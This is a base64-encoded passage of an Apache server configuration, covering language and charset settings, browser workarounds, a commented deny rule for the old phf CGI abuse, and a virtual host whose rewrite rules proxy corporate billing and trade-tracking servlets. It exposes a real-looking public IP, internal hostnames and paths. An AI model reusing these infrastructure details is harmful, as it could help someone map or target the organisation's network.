Z3VhZ2UgaXQgLml0CiAgICBBZGRMYW5ndWFnZSBqYSAuamEKICAgIEFkZENoYXJzZXQgSVNPLTIw MjItSlAgLmppcwogICAgQWRkTGFuZ3VhZ2Uga3IgLmtyCiAgICBBZGRDaGFyc2V0IElTTy0yMDIy LUtSIC5pc28ta3IKICAgIEFkZExhbmd1YWdlIG5uIC5ubgogICAgQWRkTGFuZ3VhZ2Ugbm8gLm5v CiAgICBBZGRMYW5ndWFnZSBwbCAucG8KICAgIEFkZENoYXJzZXQgSVNPLTg4NTktMiAuaXNvLXBs CiAgICBBZGRMYW5ndWFnZSBwdCAucHQKICAgIEFkZExhbmd1YWdlIHB0LWJyIC5wdC1icgogICAg QWRkTGFuZ3VhZ2UgbHR6IC5sdQogICAgQWRkTGFuZ3VhZ2UgY2EgLmNhCiAgICBBZGRMYW5ndWFn ZSBlcyAuZXMKICAgIEFkZExhbmd1YWdlIHN2IC5zZQogICAgQWRkTGFuZ3VhZ2UgY3ogLmN6CiAg ICBBZGRMYW5ndWFnZSBydSAucnUKICAgIEFkZExhbmd1YWdlIHpoLXR3IC50dwogICAgQWRkTGFu Z3VhZ2UgdHcgLnR3CiAgICBBZGRDaGFyc2V0IEJpZzUgICAgICAgICAuQmlnNSAgICAuYmlnNQog ICAgQWRkQ2hhcnNldCBXSU5ET1dTLTEyNTEgLmNwLTEyNTEKICAgIEFkZENoYXJzZXQgQ1A4NjYg ICAgICAgIC5jcDg2NgogICAgQWRkQ2hhcnNldCBJU08tODg1OS01ICAgLmlzby1ydQogICAgQWRk Q2hhcnNldCBLT0k4LVIgICAgICAgLmtvaTgtcgogICAgQWRkQ2hhcnNldCBVQ1MtMiAgICAgICAg LnVjczIKICAgIEFkZENoYXJzZXQgVUNTLTQgICAgICAgIC51Y3M0CiAgICBBZGRDaGFyc2V0IFVU Ri04ICAgICAgICAudXRmOAoKICAgICMgTGFuZ3VhZ2VQcmlvcml0eSBhbGxvd3MgeW91IHRvIGdp dmUgcHJlY2VkZW5jZSB0byBzb21lIGxhbmd1YWdlcwogICAgIyBpbiBjYXNlIG9mIGEgdGllIGR1 cmluZyBjb250ZW50IG5lZ290aWF0aW9uLgogICAgIwogICAgIyBKdXN0IGxpc3QgdGhlIGxhbmd1 YWdlcyBpbiBkZWNyZWFzaW5nIG9yZGVyIG9mIHByZWZlcmVuY2UuIFdlIGhhdmUKICAgICMgbW9y ZSBvciBsZXNzIGFscGhhYmV0aXplZCB0aGVtIGhlcmUuIFlvdSBwcm9iYWJseSB3YW50IHRvIGNo YW5nZSB0aGlzLgogICAgIwogICAgPElmTW9kdWxlIG1vZF9uZWdvdGlhdGlvbi5jPgogICAgICAg IExhbmd1YWdlUHJpb3JpdHkgZW4gZGEgbmwgZXQgZnIgZGUgZWwgaXQgamEga3Igbm8gcGwgcHQg cHQtYnIgcnUgbHR6IGNhIGVzIHN2IHR3CiAgICA8L0lmTW9kdWxlPgoKICAgICMKICAgICMgQWRk VHlwZSBhbGxvd3MgeW91IHRvIHR3ZWFrIG1pbWUudHlwZXMgd2l0aG91dCBhY3R1YWxseSBlZGl0 aW5nIGl0LCBvciB0bwogICAgIyBtYWtlIGNlcnRhaW4gZmlsZXMgdG8gYmUgY2VydGFpbiB0eXBl cy4KICAgICMKICAgIEFkZFR5cGUgYXBwbGljYXRpb24veC10YXIgLnRnegoKICAgICMKICAgICMg QWRkSGFuZGxlciBhbGxvd3MgeW91IHRvIG1hcCBjZXJ0YWluIGZpbGUgZXh0ZW5zaW9ucyB0byAi aGFuZGxlcnMiLAogICAgIyBhY3Rpb25zIHVucmVsYXRlZCB0byBmaWxldHlwZS4gVGhlc2UgY2Fu IGJlIGVpdGhlciBidWlsdCBpbnRvIHRoZSBzZXJ2ZXIKICAgICMgb3IgYWRkZWQgd2l0aCB0aGUg QWN0aW9uIGNvbW1hbmQgKHNlZSBiZWxvdykKICAgICMKICAgICMgSWYgeW91IHdhbnQgdG8gdXNl IHNlcnZlciBzaWRlIGluY2x1ZGVzLCBvciBDR0kgb3V0c2lkZQogICAgIyBTY3JpcHRBbGlhc2Vk IGRpcmVjdG9yaWVzLCB1bmNvbW1lbnQgdGhlIGZvbGxvd2luZyBsaW5lcy4KICAgICMKICAgICMg VG8gdXNlIENHSSBzY3JpcHRzOgogICAgIwogICAgI0FkZEhhbmRsZXIgY2dpLXNjcmlwdCAuY2dp CgogICAgIwogICAgIyBUbyB1c2Ugc2VydmVyLXBhcnNlZCBIVE1MIGZpbGVzCiAgICAjCiAgICAj QWRkVHlwZSB0ZXh0L2h0bWwgLnNodG1sCiAgICAjQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5z aHRtbAoKICAgICMKICAgICMgVW5jb21tZW50IHRoZSBmb2xsb3dpbmcgbGluZSB0byBlbmFibGUg QXBhY2hlJ3Mgc2VuZC1hc2lzIEhUVFAgZmlsZQogICAgIyBmZWF0dXJlCiAgICAjCiAgICAjQWRk SGFuZGxlciBzZW5kLWFzLWlzIGFzaXMKCiAgICAjCiAgICAjIElmIHlvdSB3aXNoIHRvIHVzZSBz ZXJ2ZXItcGFyc2VkIGltYWdlbWFwIGZpbGVzLCB1c2UKICAgICMKICAgICNBZGRIYW5kbGVyIGlt YXAtZmlsZSBtYXAKCiAgICAjCiAgICAjIFRvIGVuYWJsZSB0eXBlIG1hcHMsIHlvdSBtaWdodCB3 YW50IHRvIHVzZQogICAgIwogICAgI0FkZEhhbmRsZXIgdHlwZS1tYXAgdmFyCgo8L0lmTW9kdWxl PgojIEVuZCBvZiBkb2N1bWVudCB0eXBlcy4KCiMKIyBBY3Rpb24gbGV0cyB5b3UgZGVmaW5lIG1l ZGlhIHR5cGVzIHRoYXQgd2lsbCBleGVjdXRlIGEgc2NyaXB0IHdoZW5ldmVyCiMgYSBtYXRjaGlu ZyBmaWxlIGlzIGNhbGxlZC4gVGhpcyBlbGltaW5hdGVzIHRoZSBuZWVkIGZvciByZXBlYXRlZCBV UkwKIyBwYXRobmFtZXMgZm9yIG9mdC11c2VkIENHSSBmaWxlIHByb2Nlc3NvcnMuCiMgRm9ybWF0 OiBBY3Rpb24gbWVkaWEvdHlwZSAvY2dpLXNjcmlwdC9sb2NhdGlvbgojIEZvcm1hdDogQWN0aW9u IGhhbmRsZXItbmFtZSAvY2dpLXNjcmlwdC9sb2NhdGlvbgojCgojCiMgTWV0YURpcjogc3BlY2lm aWVzIHRoZSBuYW1lIG9mIHRoZSBkaXJlY3RvcnkgaW4gd2hpY2ggQXBhY2hlIGNhbiBmaW5kCiMg bWV0YSBpbmZvcm1hdGlvbiBmaWxlcy4gVGhlc2UgZmlsZXMgY29udGFpbiBhZGRpdGlvbmFsIEhU VFAgaGVhZGVycwojIHRvIGluY2x1ZGUgd2hlbiBzZW5kaW5nIHRoZSBkb2N1bWVudAojCiNNZXRh RGlyIC53ZWIKCiMKIyBNZXRhU3VmZml4OiBzcGVjaWZpZXMgdGhlIGZpbGUgbmFtZSBzdWZmaXgg Zm9yIHRoZSBmaWxlIGNvbnRhaW5pbmcgdGhlCiMgbWV0YSBpbmZvcm1hdGlvbi4KIwojTWV0YVN1 ZmZpeCAubWV0YQoKIwojIEN1c3RvbWl6YWJsZSBlcnJvciByZXNwb25zZSAoQXBhY2hlIHN0eWxl KQojICB0aGVzZSBjb21lIGluIHRocmVlIGZsYXZvcnMKIwojICAgIDEpIHBsYWluIHRleHQKI0Vy cm9yRG9jdW1lbnQgNTAwICJUaGUgc2VydmVyIG1hZGUgYSBib28gYm9vLgojICBuLmIuICB0aGUg c2luZ2xlIGxlYWRpbmcgKCIpIG1hcmtzIGl0IGFzIHRleHQsIGl0IGRvZXMgbm90IGdldCBvdXRw dXQKIwojICAgIDIpIGxvY2FsIHJlZGlyZWN0cwojRXJyb3JEb2N1bWVudCA0MDQgL21pc3Npbmcu aHRtbAojICB0byByZWRpcmVjdCB0byBsb2NhbCBVUkwgL21pc3NpbmcuaHRtbAojRXJyb3JEb2N1 bWVudCA0MDQgL2NnaS1iaW4vbWlzc2luZ19oYW5kbGVyLnBsCiMgIE4uQi46IFlvdSBjYW4gcmVk aXJlY3QgdG8gYSBzY3JpcHQgb3IgYSBkb2N1bWVudCB1c2luZyBzZXJ2ZXItc2lkZS1pbmNsdWRl cy4KIwojICAgIDMpIGV4dGVybmFsIHJlZGlyZWN0cwojRXJyb3JEb2N1bWVudCA0MDIgaHR0cDov L3NvbWUub3RoZXItc2VydmVyLmNvbS9zdWJzY3JpcHRpb25faW5mby5odG1sCiMgIE4uQi46IE1h bnkgb2YgdGhlIGVudmlyb25tZW50IHZhcmlhYmxlcyBhc3NvY2lhdGVkIHdpdGggdGhlIG9yaWdp bmFsCiMgIHJlcXVlc3Qgd2lsbCAqbm90KiBiZSBhdmFpbGFibGUgdG8gc3VjaCBhIHNjcmlwdC4K CiMKIyBDdXN0b21pemUgYmVoYXZpb3VyIGJhc2VkIG9uIHRoZSBicm93c2VyCiMKPElmTW9kdWxl IG1vZF9zZXRlbnZpZi5jPgoKICAgICMKICAgICMgVGhlIGZvbGxvd2luZyBkaXJlY3RpdmVzIG1v ZGlmeSBub3JtYWwgSFRUUCByZXNwb25zZSBiZWhhdmlvci4KICAgICMgVGhlIGZpcnN0IGRpcmVj dGl2ZSBkaXNhYmxlcyBrZWVwYWxpdmUgZm9yIE5ldHNjYXBlIDIueCBhbmQgYnJvd3NlcnMgdGhh dAogICAgIyBzcG9vZiBpdC4gVGhlcmUgYXJlIGtub3duIHByb2JsZW1zIHdpdGggdGhlc2UgYnJv d3NlciBpbXBsZW1lbnRhdGlvbnMuCiAgICAjIFRoZSBzZWNvbmQgZGlyZWN0aXZlIGlzIGZvciBN aWNyb3NvZnQgSW50ZXJuZXQgRXhwbG9yZXIgNC4wYjIKICAgICMgd2hpY2ggaGFzIGEgYnJva2Vu IEhUVFAvMS4xIGltcGxlbWVudGF0aW9uIGFuZCBkb2VzIG5vdCBwcm9wZXJseQogICAgIyBzdXBw b3J0IGtlZXBhbGl2ZSB3aGVuIGl0IGlzIHVzZWQgb24gMzAxIG9yIDMwMiAocmVkaXJlY3QpIHJl c3BvbnNlcy4KICAgICMKICAgIEJyb3dzZXJNYXRjaCAiTW96aWxsYS8yIiBub2tlZXBhbGl2ZQog ICAgQnJvd3Nlck1hdGNoICJNU0lFIDRcLjBiMjsiIG5va2VlcGFsaXZlIGRvd25ncmFkZS0xLjAg Zm9yY2UtcmVzcG9uc2UtMS4wCgogICAgIwogICAgIyBUaGUgZm9sbG93aW5nIGRpcmVjdGl2ZSBk aXNhYmxlcyBIVFRQLzEuMSByZXNwb25zZXMgdG8gYnJvd3NlcnMgd2hpY2gKICAgICMgYXJlIGlu IHZpb2xhdGlvbiBvZiB0aGUgSFRUUC8xLjAgc3BlYyBieSBub3QgYmVpbmcgYWJsZSB0byBncm9r IGEKICAgICMgYmFzaWMgMS4xIHJlc3BvbnNlLgogICAgIwogICAgQnJvd3Nlck1hdGNoICJSZWFs UGxheWVyIDRcLjAiIGZvcmNlLXJlc3BvbnNlLTEuMAogICAgQnJvd3Nlck1hdGNoICJKYXZhLzFc LjAiIGZvcmNlLXJlc3BvbnNlLTEuMAogICAgQnJvd3Nlck1hdGNoICJKREsvMVwuMCIgZm9yY2Ut cmVzcG9uc2UtMS4wCgo8L0lmTW9kdWxlPgojIEVuZCBvZiBicm93c2VyIGN1c3RvbWl6YXRpb24g ZGlyZWN0aXZlcwoKIwojIEFsbG93IHNlcnZlciBzdGF0dXMgcmVwb3J0cywgd2l0aCB0aGUgVVJM IG9mIGh0dHA6Ly9zZXJ2ZXJuYW1lL3NlcnZlci1zdGF0dXMKIyBDaGFuZ2UgdGhlICIueW91ci1k b21haW4uY29tIiB0byBtYXRjaCB5b3VyIGRvbWFpbiB0byBlbmFibGUuCiMKIzxMb2NhdGlvbiAv c2VydmVyLXN0YXR1cz4KIyAgICBTZXRIYW5kbGVyIHNlcnZlci1zdGF0dXMKIyAgICBPcmRlciBk ZW55LGFsbG93CiMgICAgRGVueSBmcm9tIGFsbAojICAgIEFsbG93IGZyb20gLnlvdXItZG9tYWlu LmNvbQojPC9Mb2NhdGlvbj4KCiMKIyBBbGxvdyByZW1vdGUgc2VydmVyIGNvbmZpZ3VyYXRpb24g cmVwb3J0cywgd2l0aCB0aGUgVVJMIG9mCiMgaHR0cDovL3NlcnZlcm5hbWUvc2VydmVyLWluZm8g KHJlcXVpcmVzIHRoYXQgbW9kX2luZm8uYyBiZSBsb2FkZWQpLgojIENoYW5nZSB0aGUgIi55b3Vy LWRvbWFpbi5jb20iIHRvIG1hdGNoIHlvdXIgZG9tYWluIHRvIGVuYWJsZS4KIwojPExvY2F0aW9u IC9zZXJ2ZXItaW5mbz4KIyAgICBTZXRIYW5kbGVyIHNlcnZlci1pbmZvCiMgICAgT3JkZXIgZGVu eSxhbGxvdwojICAgIERlbnkgZnJvbSBhbGwKIyAgICBBbGxvdyBmcm9tIC55b3VyLWRvbWFpbi5j b20KIzwvTG9jYXRpb24+CgojCQojIFRoZXJlIGhhdmUgYmVlbiByZXBvcnRzIG9mIHBlb3BsZSB0 cnlpbmcgdG8gYWJ1c2UgYW4gb2xkIGJ1ZyBmcm9tIHByZS0xLjEKIyBkYXlzLiAgVGhpcyBidWcg aW52b2x2ZWQgYSBDR0kgc2NyaXB0IGRpc3RyaWJ1dGVkIGFzIGEgcGFydCBvZiBBcGFjaGUuCiMg QnkgdW5jb21tZW50aW5nIHRoZXNlIGxpbmVzIHlvdSBjYW4gcmVkaXJlY3QgdGhlc2UgYXR0YWNr cyB0byBhIGxvZ2dpbmcgCiMgc2NyaXB0IG9uIHBoZi5hcGFjaGUub3JnLiAgT3IsIHlvdSBjYW4g cmVjb3JkIHRoZW0geW91cnNlbGYsIHVzaW5nIHRoZSBzY3JpcHQKIyBzdXBwb3J0L3BoZl9hYnVz ZV9sb2cuY2dpLgojCiM8TG9jYXRpb24gL2NnaS1iaW4vcGhmKj4KIyAgICBEZW55IGZyb20gYWxs CiMgICAgRXJyb3JEb2N1bWVudCA0MDMgaHR0cDovL3BoZi5hcGFjaGUub3JnL3BoZl9hYnVzZV9s b2cuY2dpCiM8L0xvY2F0aW9uPgoKIwojIFByb3h5IFNlcnZlciBkaXJlY3RpdmVzLiBVbmNvbW1l bnQgdGhlIGZvbGxvd2luZyBsaW5lcyB0bwojIGVuYWJsZSB0aGUgcHJveHkgc2VydmVyOgojCiM8 SWZNb2R1bGUgbW9kX3Byb3h5LmM+CiMgICAgUHJveHlSZXF1ZXN0cyBPbgojCiMgICAgPERpcmVj dG9yeSBwcm94eToqPgojICAgICAgIE9yZGVyIGRlbnksYWxsb3cKIyAgICAgICBEZW55IGZyb20g YWxsCiMgICAgICAgIEFsbG93IGZyb20gLnlvdXItZG9tYWluLmNvbQojICAgPC9EaXJlY3Rvcnk+ CgojCiMgRW5hYmxlL2Rpc2FibGUgdGhlIGhhbmRsaW5nIG9mIEhUVFAvMS4xICJWaWE6IiBoZWFk ZXJzLgogICAgIyAoIkZ1bGwiIGFkZHMgdGhlIHNlcnZlciB2ZXJzaW9uOyAiQmxvY2siIHJlbW92 ZXMgYWxsIG91dGdvaW5nIFZpYTogaGVhZGVycykKICAgICMgU2V0IHRvIG9uZSBvZjogT2ZmIHwg T24gfCBGdWxsIHwgQmxvY2sKICAgICMKICMgICBQcm94eVZpYSBPbgoKICAgICMKICAgICMgVG8g ZW5hYmxlIHRoZSBjYWNoZSBhcyB3ZWxsLCBlZGl0IGFuZCB1bmNvbW1lbnQgdGhlIGZvbGxvd2lu ZyBsaW5lczoKICAgICMgKG5vIGNhY2hlaW5nIHdpdGhvdXQgQ2FjaGVSb290KQogICAgIwogIyAg IENhY2hlUm9vdCAiL3RldXIvY3JlL2FwYWV1MTEvd3d3L2FwYWNoZS9wcm94eSIKICMgICBDYWNo ZVNpemUgNQogIyAgIENhY2hlR2NJbnRlcnZhbCA0CiAjICAgQ2FjaGVNYXhFeHBpcmUgMjQKICMg ICBDYWNoZUxhc3RNb2RpZmllZEZhY3RvciAwLjEKICMgICBDYWNoZURlZmF1bHRFeHBpcmUgMQoj ICAgIE5vQ2FjaGUgYS1kb21haW4uY29tIGFub3RoZXItZG9tYWluLmVkdSBqb2VzLmdhcmFnZS1z YWxlLmNvbQoKIzwvSWZNb2R1bGU+CiMgRW5kIG9mIHByb3h5IGRpcmVjdGl2ZXMuCgojIyMgU2Vj dGlvbiAzOiBWaXJ0dWFsIEhvc3RzCiMKIyBWaXJ0dWFsSG9zdDogSWYgeW91IHdhbnQgdG8gbWFp bnRhaW4gbXVsdGlwbGUgZG9tYWlucy9ob3N0bmFtZXMgb24geW91cgojIG1hY2hpbmUgeW91IGNh biBzZXR1cCBWaXJ0dWFsSG9zdCBjb250YWluZXJzIGZvciB0aGVtLiBNb3N0IGNvbmZpZ3VyYXRp b25zCiMgdXNlIG9ubHkgbmFtZS1iYXNlZCB2aXJ0dWFsIGhvc3RzIHNvIHRoZSBzZXJ2ZXIgZG9l c24ndCBuZWVkIHRvIHdvcnJ5IGFib3V0CiMgSVAgYWRkcmVzc2VzLiBUaGlzIGlzIGluZGljYXRl ZCBieSB0aGUgYXN0ZXJpc2tzIGluIHRoZSBkaXJlY3RpdmVzIGJlbG93LgojCiMgUGxlYXNlIHNl ZSB0aGUgZG9jdW1lbnRhdGlvbiBhdCA8VVJMOmh0dHA6Ly93d3cuYXBhY2hlLm9yZy9kb2NzL3Zo b3N0cy8+CiMgZm9yIGZ1cnRoZXIgZGV0YWlscyBiZWZvcmUgeW91IHRyeSB0byBzZXR1cCB2aXJ0 dWFsIGhvc3RzLgojCiMgWW91IG1heSB1c2UgdGhlIGNvbW1hbmQgbGluZSBvcHRpb24gJy1TJyB0 byB2ZXJpZnkgeW91ciB2aXJ0dWFsIGhvc3QKIyBjb25maWd1cmF0aW9uLgoKIwojIFVzZSBuYW1l LWJhc2VkIHZpcnR1YWwgaG9zdGluZy4KIwojTmFtZVZpcnR1YWxIb3N0IGlocXIwMmExLnBvbmwu Y28udWs6NTU4MCAKCk5hbWVWaXJ0dWFsSG9zdCAxOTQuMzYuMjQ1LjE0NTo1NTgwCgo8VmlydHVh bEhvc3QgcXdmZWV1MjEucG9jZXVyMTo1NTgwPgogICAgU1NMRW5naW5lIG9mZiAKICAgIFBvcnQg NTU4MAogICAgU2VydmVyTmFtZSBxd2ZlZXUyMQogICAgU2VydmVyQWxpYXMgcXdmZWV1MjEucG9j ZXVyMQogICAgRG9jdW1lbnRSb290IC90ZXVyL2NyZS9hcGFldTExL3d3dy9hcGFjaGUvaHRkb2Nz CiAgICBEaXJlY3RvcnlJbmRleCBpbmRleC5odG1sCiAgICAjQ3VzdG9tTG9nIC90ZXVyL2NyZS9h cGFldTExL3d3dy9hcGFjaGUvbG9ncy9hY2Nlc3NfbG9nIGNvbW1vbiAKICAgIFRyYW5zZmVyTG9n IC90ZXVyL2NyZS9hcGFldTExL3d3dy9hcGFjaGUvbG9ncy9hY2Nlc3NfbG9nIAogICAgRXJyb3JM b2cgL3RldXIvY3JlL2FwYWV1MTEvd3d3L2FwYWNoZS9sb2dzL2Vycm9yX2xvZyAKICAgIFJld3Jp dGVFbmdpbmUgT24gCiAgICBSZXdyaXRlTG9nIC90ZXVyL2NyZS9hcGFldTExL3d3dy9hcGFjaGUv bG9ncy9yZXdyaXRlX2xvZyAgCiAgICBSZXdyaXRlTG9nTGV2ZWwgOSAgCiAgICBSZXdyaXRlUnVs ZSAgXiQgIC8KIwojIyMjIyMjIEZvciBCaWxsUHJpbnQgYXBwbGljYXRpb24gICAgICAgICAgIyMj IyMKIyBSZXdyaXRlQ29uZCAle1JFUVVFU1RfVVJJfSAgXiguKikvcHJvZHVjdHMvY29ycC9hcHBz L0JpbGxQcmludC8oLiopJAojIFJld3JpdGVSdWxlIF4vcHJvZHVjdHMvY29ycC9hcHBzL0JpbGxQ cmludC8oLiopJCAgaHR0cDovL3F3ZmVldTIxLnBvY2V1cjE6ODcyMS9wcm9kdWN0cy9jb3JwL2Fw cHMvQmlsbFByaW50LyQxIFtQLExdCiMKIyMjIyMjIyBGb3IgRUNTIGFwcGxpY2F0aW9uICAgICAg ICAgICMjIyMjCiAgICBSZXdyaXRlQ29uZCAle1JFUVVFU1RfVVJJfSAgXiguKikvcHJvZHVjdHMv Y29ycC9hcHBzL2Vjcy9TZXJ2bGV0KC4qKSQKICAgIFJld3JpdGVDb25kICV7UVVFUllfU1RSSU5H fSBeKC4qKWdldHMoLiopJCAKICAgIFJld3JpdGVSdWxlIF4vcHJvZHVjdHMvY29ycC9hcHBzL2Vj cy9TZXJ2bGV0KC4qKSQgIGh0dHA6Ly9paHFyMDNhMTo4MDg3L3Byb2R1Y3RzL2NvcnAvYXBwcy9l Y3MvU2VydmxldCQxIFtQLExdIAojCiMjIyMjIyMgRm9yIElWRVMgYXBwbGljYXRpb24gICAgICAg ICAgIyMjIyMKICAgIFJld3JpdGVDb25kICV7UkVRVUVTVF9VUkl9ICBeKC4qKS9wcm9kdWN0cy9j b3JwL2FwcHMvdmVzL1NlcnZsZXQoLiopJAogICAgUmV3cml0ZUNvbmQgJXtRVUVSWV9TVFJJTkd9 IF4oLiopcG9ubCguKikkIAogICAgUmV3cml0ZVJ1bGUgXi9wcm9kdWN0cy9jb3JwL2FwcHMvdmVz L1NlcnZsZXQoLiopJCAgaHR0cDovL2locXIwM2ExOjgwODcvcHJvZHVjdHMvY29ycC9hcHBzL3Zl cy9TZXJ2bGV0JDEgW1AsTF0gCiMKIyMjIyMjIyBGb3IgVkVTU0VMIGFwcGxpY2F0aW9uICAgICAg ICAgIyMjIyMKICAgIFJld3JpdGVDb25kICV7UkVRVUVTVF9VUkl9ICBeKC4qKS9wcm9kdWN0cy9j b3JwL2FwcHMvdmVzc2VsL1NlcnZsZXQoLiopJAogICAgUmV3cml0ZUNvbmQgJXtRVUVSWV9TVFJJ Tkd9IF4oLiopdmVzc2VsKC4qKSQgCiAgICBSZXdyaXRlUnVsZSBeL3Byb2R1Y3RzL2NvcnAvYXBw cy92ZXNzZWwvU2VydmxldCguKikkICBodHRwOi8vaWhxcjAzYTE6ODA4Ny9wcm9kdWN0cy9jb3Jw L2FwcHMvdmVzc2VsL1NlcnZsZXQkMSBbUCxMXSAKIwojIyMjIyMjIEZvciBQb2ludC1Uby1Qb2lu dCBhcHBsaWNhdGlvbiAjIyMjIwogICAgUmV3cml0ZUNvbmQgJXtSRVFVRVNUX1VSSX0gIF4oLiop L3Byb2R1Y3RzL2NvcnAvYXBwcy9Qb2ludF9Ub19Qb2ludC9TZXJ2bGV0KC4qKSQKICAgIFJld3Jp dGVDb25kICV7UVVFUllfU1RSSU5HfSBeKC4qKXZlc19QX1RvX1AoLiopJCAKICAgIFJld3JpdGVS dWxlIF4vcHJvZHVjdHMvY29ycC9hcHBzL1BvaW50X1RvX1BvaW50L1NlcnZsZXQoLiopJCAgaHR0 cDovL2locXIwM2ExOjgwODcvcHJvZHVjdHMvY29ycC9hcHBzL1BvaW50X1RvX1BvaW50L1NlcnZs ZXQkMSBbUCxMXSAKIwojIyMjIyMjIEZvciBUcmFkZWxhbmUgYXBwbGljYXRpb24gICAgICAjIyMj IwogICAgUmV3cml0ZUNvbmQgJXtSRVFVRVNUX1VSSX0gIF4oLiopL3Byb2R1Y3RzL2NvcnAvYXBw cy90cmFkZWxhbmUvU2VydmxldCguKikkCiAgICBSZXdyaXRlQ29uZCAle1FVRVJZX1NUUklOR30g XiguKil0cmFkZWxhbmUoLiopJCAKICAgIFJld3JpdGVSdWxlIF4vcHJvZHVjdHMvY29ycC9hcHBz L3RyYWRlbGFuZS9TZXJ2bGV0KC4qKSQgIGh0dHA6Ly9paHFyMDNhMTo4MDg3L3Byb2R1Y3RzL2Nv cnAvYXBwcy90cmFkZWxhbmUvU2VydmxldCQxIFtQLExdIAojCiMjIyMjIyMgRm9yIFRyYWRlTGFu ZSBNYWludGVuYW5jZSAgICAgICAjIyMjIwogICAgUmV3cml0ZUNvbmQgJXtSRVFVRVNUX1VSSX0g IF4oLiopL3Byb2R1Y3RzL2NvcnAvYXBwcy90cmFkZWxfbWFpbnQvU2VydmxldCguKikkCiAgICBS ZXdyaXRlQ29uZCAle1FVRVJZX1NUUklOR30gXiguKil0cmFkZWxfbWFpbnQoLiopJCAKICAgIFJl d3JpdGVSdWxlIF4vcHJvZHVjdHMvY29ycC9hcHBzL3RyYWRlbF9tYWludC9TZXJ2bGV0KC4qKSQg IGh0dHA6Ly9paHFyMDNhMTo4MDg3L3Byb2R1Y3RzL2NvcnAvYXBwcy90cmFkZWxfbWFpbnQvU2Vy dmxldCQxIFtQLExdIAojCiMjIyMjIyMgQWxsb3cgdGhlIFN0YXRpYyBIb21lUGFnZSBvZiBFQ1Ig ICAgICAgIyMjIyMKICAgIFJld3JpdGVDb25kICV7UkVRVUVTVF9VUkl9ICBeKC4qKS9wcm9kdWN0 cy9jb3JwL2FwcHMvZWNyKC4qKSQKICAgIFJld3JpdGVSdWxlIF4vcHJvZHVjdHMvY29ycC9hcHBz L2Vjci9Ib21lUGFnZSguKikkICBodHRwOi8vaWhxcjAzYTE6ODA4Ny9wcm9kdWN0cy9jb3JwL2Fw cHMvZWNyL0hvbWVQYWdlJDEgIFtQLExdCiMKIyMjIyMjIyBGb3IgRVRTIGFwcGxpY2F0aW9uICAg ICAgICAgICMjIyMjCiAgICBSZXdyaXRlQ29uZCAle1JFUVVFU1RfVVJJfSAgXiguKikvcHJvZHVj dHMvY29ycC9hcHBzL2dlY3MvU2VydmxldCguKikkCiAgICBSZXdyaXRlQ29uZCAle1FVRVJZX1NU UklOR30gXiguKilldHMoLiopJCAKICAgIFJld3JpdGVSdWxlIF4vcHJvZHVjdHMvY29ycC9hcHBz L2dlY3MvU2VydmxldCguKikkICBodHRwczovL3F3ZmVldTIxLnBvY2V1cjE6NTU0My9wcm9kdWN0 cy9jb3JwL2FwcHMvZ2Vjcy9TZXJ2bGV0JDEgW1IsTF0gCiMKIyMjIyMjIyBGb3IgRUNSIGFwcGxp Y2F0aW9uICAgICAgICAgICMjIyMjCiAgICBSZXdyaXRlQ29uZCAle1JFUVVFU1RfVVJJfSAgXigu KikvcHJvZHVjdHMvY29ycC9hcHBzL2dlY3MvU2VydmxldCguKikkCiAgICBSZXdyaXRlQ29uZCAl e1FVRVJZX1NUUklOR30gXiguKillY3IoLiopJAogICAgUmV3cml0ZVJ1bGUgXi9wcm9kdWN0cy9j b3JwL2FwcHMvZ2Vjcy9TZXJ2bGV0KC4qKSQgIGh0dHBzOi8vcXdmZWV1MjEucG9jZXVyMTo1NTQz L3Byb2R1Y3RzL2NvcnAvYXBwcy9nZWNzL1NlcnZsZXQkMSBbUixMXSAKIwojIyMjIyMjIEZvciBF VFQgYXBwbGljYXRpb24gICAgICAgICAgIyMjIyMKICAgIFJld3JpdGVDb25kICV7UkVRVUVTVF9V Ukl9ICBeKC4qKS9wcm9kdWN0cy9jb3JwL2FwcHMvZ2Vjcy9TZXJ2bGV0KC4qKSQKICAgIFJld3Jp dGVDb25kICV7UVVFUllfU1RSSU5HfSBeKC4qKWV0dCguKikkCiAgICBSZXdyaXRlUnVsZSBeL3By b2R1Y3RzL2NvcnAvYXBwcy9nZWNzL1NlcnZsZXQoLiopJCAgaHR0cHM6Ly9xd2ZlZXUyMS5wb2Nl dXIxOjU1NDMvcHJvZHVjdHMvY29ycC9hcHBzL2dlY3MvU2VydmxldCQxIFtSLExdIAojCiMjIyMj IyMgRm9yIEJBU0lDIGFwcGxpY2F0aW9uICAgICAgICAgICMjIyMjCiAgICBSZXdyaXRlQ29uZCAl e1JFUVVFU1RfVVJJfSAgXiguKikvcHJvZHVjdHMvY29ycC9hcHBzL2dlY3MvU2VydmxldCguKikk CiAgICBSZXdyaXRlQ29uZCAle1FVRVJZX1NUUklOR30gXiguKiliYXNpYyguKikkCiAgICBSZXdy aXRlUnVsZSBeL3Byb2R1Y3RzL2NvcnAvYXBwcy9nZWNzL1NlcnZsZXQoLiopJCAgaHR0cHM6Ly9x d2ZlZXUyMS5wb2NldXIxOjU1NDMvcHJvZHVjdHMvY29ycC9hcHBzL2dlY3MvU2VydmxldCQxIFtS LExdIAojCiMjIyMjIyMgRm9yIFNPTlkgUmVxdWVzdCBmb3IgVHJhY2sgYW5kIFRyYWNlICMjIyMg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICBSZXdyaXRlQ29uZCAle1JFUVVFU1Rf VVJJfSAgXiguKikvcHJvZHVjdHMvY29ycC9hcHBzL2Vjcy9TZXJ2bGV0L3NvbnkoLiopJAogICAg UmV3cml0ZVJ1bGUgXi9wcm9kdWN0cy9jb3JwL2FwcHMvZWNzL1NlcnZsZXQvc29ueSguKikkICBo dHRwOi8vaWhxcjAzYTE6ODA4Ny9wcm9kdWN0cy9jb3JwL2FwcHMvZ2Vjcy9TZXJ2bGV0P3BhdGhp bmZvPS9iYXNpYy9SZWRpcmVjdC5odG1sJmN1c3RJZD1zb255JiV7UVVFUllfU1RSSU5HfSBbUCxM XQojCiMjIyMjIyMgTm8gb3RoZXIgYXBwbGljYXRpb24gICAgICAgICAjIyMjIwogICAgUmV3cml0 ZUNvbmQgJXtSRVFVRVNUX1VSSX0gIF4oLiopL3Byb2R1Y3RzL2NvcnAvYXBwcyguKikkCiAgICBS ZXdyaXRlQ29uZCAle1FVRVJZX1NUUklOR30gXiguKilodG0oLiopJCAKICAgIFJld3JpdGVSdWxl IF4vcHJvZHVjdHMvY29ycC9hcHBzKC4qKSQgIGh0dHA6Ly9xd2ZlZXUyMS5wb2NldXIxOjU1ODAv 